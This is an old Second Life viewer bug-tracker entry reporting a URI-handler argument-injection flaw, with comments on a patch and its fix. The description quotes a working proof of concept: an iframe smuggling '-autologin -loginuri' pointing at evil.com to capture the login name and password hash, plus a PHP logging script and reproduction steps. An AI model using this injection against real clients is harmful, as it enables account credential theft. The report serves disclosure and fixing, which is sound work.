• All submissions to this site are governed by Second Life Project Contribution Agreement. By submitting patches and other information using this site, you acknowledge that you have read, understood, and agreed to those terms.
Issue Details (XML | Word | Printable)

Key: VWR-2508
Type: Bug Bug
Status: Resolved Resolved
Resolution: Fixed
Priority: Critical Critical
Assignee: Unassigned
Reporter: Till Stirling
Votes: 1
Watchers: 0
Operations

If you were logged in you would be able to see more operations.
1. Second Life Viewer - VWR

Major Exploit to get access to another users account!

Created: 18/Sep/07 02:59 AM   Updated: 29/Jun/08 11:22 AM
Return to search
Component/s: User Interface
Affects Version/s: Source code, Other (please specify in issue description), 1.18.3 Release Candidate, 1.18.0, 1.18.1.2, 1.18.2.0
Fix Version/s: None

File Attachments: 1. Zip Archive SecondLife-1.18.2.0-uriexploit-patch.zip (2 kB)
Environment: Windws / Linux (?)

Linden Lab Issue ID: DEV-11213


 Description  « Hide
Quote from: http://www.gnucitizen.org/blog/ie-pwns-secondlife

Eploit Code:
<iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe>

Upon visiting the malicious page, the SecondLife client will launch and try to login automatically (-autologin) via the CGI located at http://evil.com/sl/record-login.php. At that moment, the following request is generated to the malicious CGI script. Yes, it is XML-RPC remote call:

[HTTP_RAW_POST_DATA] => <methodCall>
<methodName>login_to_simulator</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>first</name>
<value>
<string>Elm</string>
</value>
</member>
<member>
<name>last</name>
<value>
<string>Blanco</string>
</value>
</member>
<member>
<name>passwd</name>
<value>
<string>$1$[MD5 Hash of the password here]</string>
</value>
</member>
<member>
<name>start</name>
<value>
<string>last</string>
</value>
</member>
<member>
<name>version</name>
<value>
<string>1.18.2.0</string>
</value>
</member>
<member>
<name>channel</name>
<value>
<string>Second Life Release</string>
</value>
</member>
<member>
<name>platform</name>
<value>
<string>Win</string>
</value>
</member>
...
...
...
</methodCall>

Notice [MD5 Hash of the password here] place holder. This is where the user password is located. The password is MD5 hashed for security reason. Well, this is definitely a good thing, although completely pointless since there are plenty of rainbow tables out there, which attackers can use to convert the hash back to normal string.

Keep in mind that most attacker don't event have to convert the hash back to a password string. Attackers can login with the hash itself by forging a request to one of the SecondLife authentication servers. The unhashed password is only needed in situations where the attacker wants to explore other on-line service the victim is currently registered with.
Unfortunately, I cannot construct on-line proof of concept, due to the fact that I need to expose this server to all sorts of attacks, but you can try to repeat my steps. Here is how you can do it:

Get Apache with PHP
Put the following script into a file called login.php:
<?php
ob_start();
print_r($GLOBALS);
error_log(ob_get_contents(), 0);
ob_end_clean();
?>

Tail -f the PHP error log file. Or if you don't know what I am talking about, just skip this step.
Make a page with the following HTML body:

<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>Open the page inside Internet Explorer

(both IE6 and IE7 are exploitable).

After the SecondLife client fails to login, you will get a message within your php error log, which gives you the credentials plus some other useful info about the victim.



 All   Comments   Change History      Sort Order: Ascending order - Click to sort in descending order
[ Permlink | « Hide ]
Till Stirling added a comment - 18/Sep/07 03:02 AM
Forgot the source URL: http://www.gnucitizen.org/blog/ie-pwns-secondlife

[ Permlink | « Hide ]
Lex Neva added a comment - 18/Sep/07 09:08 AM
Wow... either this is a problem with IE's handling of url-handlers such as secondlife://, or it's a problem with second life's argument parsing. Either way, this is a nasty little piece of work.

It's not a good idea to post exploits like this in the public JIRA, although it's kind of a moot point since the author of the exploit posted it on their website. Please use the Report Bug tool in-world and mention this JIRA issue and mark the issue as an Exploit. LL needs to know about this.


[ Permlink | « Hide ]
meade paravane added a comment - 18/Sep/07 11:29 AM
There's forum talk about this, too.

And It's not just IE..


[ Permlink | « Hide ]
Jonash Vanalten added a comment - 18/Sep/07 11:41 AM
I've produced a binary patch for this for the windows viewer version 1.18.2.0

I can attach the utility (2kb) if that would be useful to anyone.


[ Permlink | « Hide ]
Jonash Vanalten added a comment - 18/Sep/07 11:58 AM
This zip file contains a 6kb executable file which will patch the windows 1.18.2.0 secondlife viewer executable to remove the loginuri feature and prevent the exploit from working.

A readme file is also included explaining how to utilize the patch.



[ Permlink | « Hide ]
Freija Yoshikawa added a comment - 19/Sep/07 11:36 PM
This would appear to be an opening for a "man in the middle" attack,
server acceptance of the XML-RPC with pass-through to the master LL servers for authentication,
any "successful" logins can then have the log stored with unsuccessful logins removed from the sesion logging

[ Permlink | « Hide ]
Gigs Taggart added a comment - 24/Sep/07 02:59 AM
This is fixed.


Powered by Atlassian JIRA the Professional Issue Tracker. (Enterprise Edition, Version: 3.13.2-#335) - Bug/feature request - Atlassian news - Contact Administrators